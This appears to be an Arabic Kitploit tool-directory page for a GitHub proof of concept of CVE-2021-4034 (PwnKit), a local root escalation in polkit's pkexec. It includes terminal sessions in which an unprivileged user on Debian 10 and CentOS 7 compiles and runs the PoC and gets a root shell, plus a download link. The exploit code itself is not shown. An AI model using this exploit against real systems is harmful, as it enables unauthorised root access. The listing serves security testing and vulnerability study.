Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
POC-CVE-2021-4034 — إثبات مفهوم لاستغلال CVE-2021-4034 (PwnKit)، وهو تصعيد صلاحيات محلي في pkexec الخاص بـ polkit، تم التحقق منه على Debian 10 و CentOS 7. | Kitploit
أدوات/GitHubGitHub/yakumwamba/poc-cve-2021-4034
تصعيد الامتيازاتأطر الاستغلالتحليل الثغرات الأمنيةالاستغلالاختبار الاختراق
GitHubyakumwamba/poc-cve-2021-4034

POC-CVE-2021-4034

إثبات مفهوم لاستغلال CVE-2021-4034 (PwnKit)، وهو تصعيد صلاحيات محلي في pkexec الخاص بـ polkit، تم التحقق منه على Debian 10 و CentOS 7.

عرض المستودع
423منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

polkit-bug

CVE-2021-4034

على الرغم من أن هذه الثغرة الأمنية غير قابلة للاستغلال عن بُعد ولا تسمح بحد ذاتها بتنفيذ تعليمات برمجية عشوائية، إلا أنها يمكن أن يستخدمها المهاجمون الذين تمكنوا بالفعل من الحصول على موطئ قدم على مضيف ضعيف لتصعيد صلاحياتهم وتحقيق تلك القدرة.

https://seclists.org/oss-sec/2022/q1/80https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

PoC

تم التحقق منه على Debian 10 و CentOS 7.

يمكنك العثور على المستودع عبر هذا الرابط ← https://github.com/Yakumwamba/POC-CVE-2021-4034.git

root@kitploit:~
user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)
root@kitploit:~
[user@centos ~]$ grep PRETTY /etc/os-release
PRETTY_NAME="CentOS Linux 7 (Core)"
[user@centos ~]$ id
uid=11000(user) gid=11000(user) groups=11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[user@centos ~]$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
[user@centos ~]$ ./cve-2021-4034-poc
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit

إخلاء مسؤولية - يمكن استخدام هذه الأداة بشكل خبيث

يمكن استخدامها أيضًا لإلحاق الضرر بخوادم Linux غير المحدثة أو تعطيلها. مؤلف هذه الأداة غير مسؤول عن أي أضرار أو خسائر قد تحدث نتيجة استخدامها.

تنزيل الأداة